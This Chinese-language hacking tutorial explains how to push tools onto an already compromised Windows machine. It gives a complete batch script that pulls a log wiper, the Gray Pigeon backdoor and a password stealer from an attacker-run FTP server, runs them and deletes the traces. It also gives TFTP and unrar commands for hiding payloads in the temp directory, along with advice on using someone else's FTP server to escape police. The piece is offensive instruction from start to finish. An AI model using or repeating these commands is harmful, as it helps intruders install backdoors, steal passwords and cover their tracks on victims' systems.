在入侵过程中,我们总会上传各种不同的程序,比如扫描工具、后门程序、擦除日志工具等,要是我们在交互界面下操作的话是比较轻松的,但如果我们只能通过TFTP上传,一次只能一个程序上传,类似的操作少量倒无所谓,问题是常常在入侵过程中我们总会遇到上传程序较大、教多的情况下,那你就只能边擦汗边等待了?NO!有办法的,
灵活的批量上传
。批处理与FTP相结合实现批量上传
我们如何突破限制呢?聪明的朋友一定想到了批处理吧?对了,我们可以建立一个BAT文件,从我们巳架设好的FTP上下载指定的程序。下面我就说说如何设置批处理文件:
@echo open 域名地址 >ftp.txt
@echo FTP帐号 >>ftp.txt
@echo FTP密码 >>ftp.txt
@echo binary >>ftp.txt //以上命令建立FTP帐号
@echo get logkiller.exe >>ftp.txt //下载清除日志的程序
@echo get hugezi.exe >>ftp.txt //下载灰鸽子程序
@echo get getpass.exe >>ftp.txt //下载偷密码的程序
@echo bye >>ftp.txt //以上命令建立FTP帐号并下载指定文件
@ftp -s:ftp.txt
@hugezi.exe
@getpass.exe
@logkiller.exe //运行下载的文件
@del hugezi.exe
@del logkiller.exe
@del ftp.txt
@del attack.bat //删除所有建立文件
把上面的代码保存为attack.bat,再把它上传到已入侵的机器,运行后你会发现你所指定的程序下载并运行了!这样即使我们得到的只是CMD命令行,也可以一次批量下载自己需要的程序了,
电脑资料
《灵活的批量上传》(https://www.unjs.com)。如果你不想删除程序,把@del 部分去掉就可以了,文件数量自己要控制好。别外提醒一下大家:BAT文件里这个下载文件的FTP最好不是自己的,要不然留下IP或是域名,某天公安局叔叔打来电话来的时候你可不要怪我没有提醒你哟!
RAR压缩批量上传
还有什么办法呢?那就是利用WINRAR的解压缩命令了。随着时间的推移,日月变迁,大家习惯了WINRAR的GUI界面了,嘿嘿,这儿指的可是WINRAR的命令行解压缩命令哦。不知大家统计过没有,在入侵的机器中,装WINRAR的占用了百分之几?我认为个人机子的话应达到75%以上(自己统计的,没有权威),要是网站服务器(包括虚拟机)的就不清楚了。下面我们看一下如何利用这个不被注意的好东东吧。
先查一下对方的机器是不是安装了WINRAR,一般看看X:\Program Files\WinRAR 目录(X为系统盘),我们可爱的UNRAR.exe 就在那个目录里!再来:
copy x:\Program Files\WinRAR\unrar.exe x:\winnt\temp
这样就把unrar.exe复制到系统的临时目录下了,要是没有RAR的话,你可要自己上传这个程序哦(你自己没有?天!恐龙级的古老人物!)。
在本地把自己要上传的文件打包,SIZE尽量控制不要太大(我喜欢在400K大小),压缩率当然选最好,通过CMD窗口,用TFTP命令上传到入侵机器的TEMP目录,因为临时目录比较隐蔽的,用以下命令:
TFTP -i ip get ok.rar
unrar e ok.rar //e 参数表示解压到当前目录下
dir
呵呵,怎么样?是不是有点成就感?我们一次就把几次的工作做完了,赚到的时间可以用来做其他事情咯!
对了,大家要是不懂UNRAR的命令行用法,请在本地CMD下输入unrar.exe /help >help.txt 再打开help.txt文件,就一目了然了。如果大家有更好的方法,写出来一起交流吧,共同进步才是我们共同的目的,也希望朋友们能用上这两个方法!